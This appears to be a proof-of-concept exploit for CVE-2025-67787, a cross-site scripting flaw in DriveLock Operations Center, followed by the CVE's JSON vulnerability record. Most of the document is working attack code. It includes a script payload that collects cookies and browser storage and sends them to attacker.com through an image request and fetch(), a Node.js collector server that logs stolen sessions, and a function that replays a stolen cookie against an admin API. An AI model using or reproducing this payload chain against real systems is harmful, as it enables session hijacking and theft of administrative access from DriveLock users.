CVE-2025-67787

// CVE-2025-67787 PoC - DriveLock Operations Center XSS Session Hijacking // Author: Security Researcher // Date: 2025-12-17 // Malicious payload to be injected into DriveLock Operations Center input fields const xssPayload = `<script> // Steal session cookie and send to attacker's server var stolenCookie = document.cookie; var attackerServer = 'https://attacker.com/collect'; // Create image object to send cookie silently var img = new Image(); img.src = attackerServer + '?cookie=' + encodeURIComponent(stolenCookie) + '&location=' + encodeURIComponent(window.location.href); // Alternative: Use fetch API for more reliable exfiltration fetch(attackerServer + '/log', { method: 'POST', mode: 'no-cors', body: JSON.stringify({ cookie: stolenCookie, sessionStorage: JSON.stringify(sessionStorage), localStorage: JSON.stringify(localStorage), referrer: document.referrer, timestamp: new Date().toISOString() }) }); </script>`; // Attacker's server-side collector (example in Node.js) /* const express = require('express'); const app = express(); app.get('/collect', (req, res) => { console.log('Stolen Cookie:', req.query.cookie); console.log('Location:', req.query.location); res.send('OK'); }); app.post('/log', (req, res) => { let data = ''; req.on('data', chunk => data += chunk); req.on('end', () => { console.log('Stolen Data:', data); fs.appendFileSync('stolen_sessions.log', data + '\n'); }); res.send('OK'); }); app.listen(8080); */ // Session hijacking attack using stolen cookie /* const https = require('https'); function hijackSession(targetUrl, stolenCookie) { const options = { hostname: new URL(targetUrl).hostname, port: 443, path: '/OperationsCenter/api/admin/config', method: 'GET', headers: { 'Cookie': stolenCookie, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Accept': 'application/json' } }; const req = https.request(options, (res) => { let data = ''; res.on('data', chunk => data += chunk); res.on('end', () => { console.log('Session Valid! Response:', data); // Now attacker has full admin access }); }); req.on('error', (e) => { console.error('Error:', e.message); }); req.end(); } // Usage: hijackSession('https://drivelock-server.local', 'ASP.NET_SessionId=abc123...'); */

{"cve": {"id": "CVE-2025-67787", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:57.040", "lastModified": "2026-01-02T15:55:01.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in 25.1.2 before 25.1.5. A Cross Site Scripting (XSS) issue in DriveLock Operations Center allows for session takeover over a network."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:drivelock:drivelock:25.1.2:*:*:*:*:*:*:*", "matchCriteriaId": "3A38F1A2-8F5A-4B84-8468-0D79719C0715"}, {"vulnerable": true, "criteria": "cpe:2.3:a:drivelock:drivelock:25.1.4:*:*:*:*:*:*:*", "matchCriteriaId": "94B8CA80-9694-4A8E-9DE8-D7A736827093"}]}]}], "references": [{"url": "https://drivelock.help/versions/current/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-002-CrossSiteScripting.htm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}